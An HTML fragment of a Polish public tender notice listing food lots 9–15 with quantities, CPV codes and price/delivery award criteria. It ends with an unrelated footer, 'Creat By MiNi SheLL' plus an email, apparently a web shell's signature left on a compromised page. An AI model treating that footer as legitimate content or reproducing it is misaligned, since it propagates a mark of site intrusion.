<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta	kg	40
Bułki 50g	szt	150
Chleb krojony pszenny 0,6 kg	szt	4000
Chleb ziarnisty 400g	szt	200
Drożdżówki	szt	100
Pączki 100g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kasza jęczm. średnia	kg	40
Kasza manna 0,5 kg	szt.	30
Mąka pszenna typu 450	kg	120
Mąka pszenna typu 500	kg	120
Mąka ziemiaczna	kg	20
Platki kukur.kakaowe 250g	szt	40
Platki kukur.kakaowe 500g	szt	7
Platki kukurydz. 500 g	szt	10
Płatki kukurydz. 250 g.	szt	38
Ryż 1kg	kg	40
Ryż saszetki 400 g.	szt.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz czerwony- koncentrat 300 ml 	szt	40
Baton czekoladowy nadziewany	szt	50
Bazylia 10 g.	szt.	3
Bialy barszcz	szt	40
Budyń 40 g	szt	200
Cukier	kg	320
Cukier puder min. 400 g.	szt	40
Cukier wanilinowy 30g	szt	40
Cynamon 15g	szt	10
Czekolada pełnomleczna 100g	szt	50
Drożdże 100 g	szt	30
Galaretka owocowa	szt	150
Hebata expres owocowa min. 20 szt	szt	10
Herbata expres 100 szt	szt	80
Jarzynka 200 g	szt	11
Kakao rozpuszczalne min 250 g	szt	30
Kawa rozpuszczalna naturalna 200 g.	szt	2
Kawa rozpuszczalna zboż typu inka min. 200 g.	szt	20
Ketchup min 480 g 	szt	25
Ketchup pikantny min. 480 g	szt	25
Kisiel min. 35 g	szt	200
Krem czekoladowo orzechowy 400 g	szt	10
Krem czekoladowo orzechowy min 180 g	szt	20
Krem czekoladowy 400 g	szt	10
Krem czekoladowy min. 180  g	szt	200
Kwasek cytrynowy 20 g	szt	80
Liść laurowy 6 g	szt	40
Maggi w plynie 960 ml	szt	38
Majeranek 8 g	szt	20
Majonez  400 g 	szt	40
Majonez 700 g  	szt	20
Makaron gniazda 1 kg	szt	20
Makaron nitka cięta 1 kg 	szt	40
Makaron rurki 1 kg	szt	10
Makaron spaghetti 0,5 kg	szt	70
Makaron świderki 1kg	szt	50
Mikołaj czekoladowy	szt	50
Miód sztuczny 400 g	szt	10
Musztrda tuba 0.5 l	szt	14
Ocet 10% 500 ml	szt	10
Papryka mielona 20 g	szt	30
Paprykarz szczeciń 130 g	szt	60
Pasztet min. 131 g z pomidorami	szt	50
Pasztet puszka min. 159 g	szt	50
Pieprz cayenne	szt	6
Pieprz mielony 20 g	szt	250
Pieprz ziolowy 20 g	szt	10
Proszek do pieczenia 30 g	szt	41
Przyprawa do grilla 20 g	szt	16
Przyprawa do kurczaka 25 g	szt	30
Przyprawa do mięsa 75 g  	szt	40
Przyprawa gyros 25 g	szt	10
Rosół drobiowy kostki mni. 60 g 	szt	20
Sos fix do spaghetti 45 g	szt	200
Sos mix koper-zioł, włoski itp. 9 g	szt	20
Sos sałatkowy mix  9 g	szt	20
Sól	kg	100
Tymianek	szt	4
Vegeta 200 g	szt	80
Wafelek w polewie	szt	50
Wiórki kokosowe 200 g	szt	10
Żelatyna min. 40 g	szt	10
Ziele angielskie 15 g	szt	35
Zupki  chińska (ostra,łagodna rosołowa itp.)	szt	150
Żurek w proszku 60 g	szt	240
Żurek w butelce min. 320 ml.	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Margaryna  do pieczenia 250g	szt	20
Margaryna z masłem 500g	szt	250
Olej 1l	szt	100
Smalec 200g	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt owocowy 150g	szt	50
Jogurt pitny 250g	szt	100
Jogurt z owocami 115g	szt	600
Masło śmietank. 200G	szt	800
Mleko 3,2  1l UHT	szt	520
Ser edamski	kg	40
Ser gouda	kg	40
Ser morski	kg 40
Ser salami	kg	20
Ser top. krążek 140g	szt	80
Ser topiony -kielbaski 100g	szt	85
Ser twarogowy 200g	szt	100
Ser twarogowy półtusty	 kg	50
Ser tylżycki	kg	40
Serek grani  200 g	szt	50
Serek homogenizowany 200g	szt	50
Serek kanapk. Twarożk. 125g	szt	300
Serek topiony kostka 100g	szt	500
Serek twarożkowy w kubeczku 150g	szt	200
Śmietana 12 % - słodka 0,5l UHT	szt	30
Śmietana 18 %  400ml - zakwaszana	szt	185
Śmietana 30 %  0,5l.	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napoje gazowane 1,5 l	szt	10
Napoje niegazowane 1,5 l	szt	10
Woda mineralna 0,5 gazowana	szt	50
Woda 0,5 n/g 	szt	50
Woda mineralna n/g 1,5 l 	szt	20
Woda mineralna g 1,5 l 	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - cukiernicze produkty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas (w syropie) 580 ml	szt	12
Brzoskwinia (w syropie) 850 ml	szt	12
Chałwa 	kg	5
Cukier kryształ	kg	200
Cukier puder	kg	60
Cukier wanilinowy	kg	2
Cynamon	kg	1
Dekoracje róże duże	op	2
Dekoracje róże średnie	op	2
Drożdże	kg	10
Emulgator (pronto)	kg	5
Esencja anyżowa 800 ml	szt	1
Esencja cytrynowa 800 ml 	szt	1
Esencja migdałowa 800 ml	szt	1
Esencja wanilinowa 800 ml	szt	1
Galaretki różne	kg	5
Gałka muszkatałowa mielona	kg	0,5
Gożdzik mielony	kg	0,5
Isomalt	kg	5
Jabłko prażone	kg	50
Jajka	szt	3000
Kakao	kg	10
Kokos medium	kg	5
Krem budyniowy (na zimno) ideal	kg	20
Kuwertura biała	kg	5
Kuwertura deserowa	kg	30
Kasza manna	kg	10
Mak niebieski	kg	50
Mąka pszenna tortowa	kg	300
Mąka ziemniaczana	kg	50
Marcepan (50%)	kg	10
Margaryna (80%)	kg	220
Margaryna puff	kg	60
Marmolada	kg	20
Masa marcepanowa ticino	kg	10
Masa orzechowa	kg	10
Masa ticino	kg	10
Masło	kg	60
Mleko 3,2% UHT 1l	szt	40
Migdały 	kg	5
Migdał płatki	kg	5
Miód płynny	kg	2
Olej 	l	45
Orzech laskowy	kg	5
Orzech włoski	kg	5
Orzech ziemny	kg	5
Pomada wodna	kg	30
Proszek do pieczenia	kg	1
Przyprawa korzenna	kg	5
Rodzynki	kg	16
Skórka pomarańczowa	kg	10
Spirytus cukierniczy	l.	5
Stabilizator neutral	kg	5
Syrop skrobiowy 	kg	6
Śmietana naturalna 30% 1l	szt	50
Tłuszcz frytura	l	10
Toffi (kajmak)	kg	10
Twaróg świeży	kg	55
Wiśnia kandyzowana w syropie	kg	13
Wiśnia kandyzowana  sucha	kg	8
Żelatyna spożywcza	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com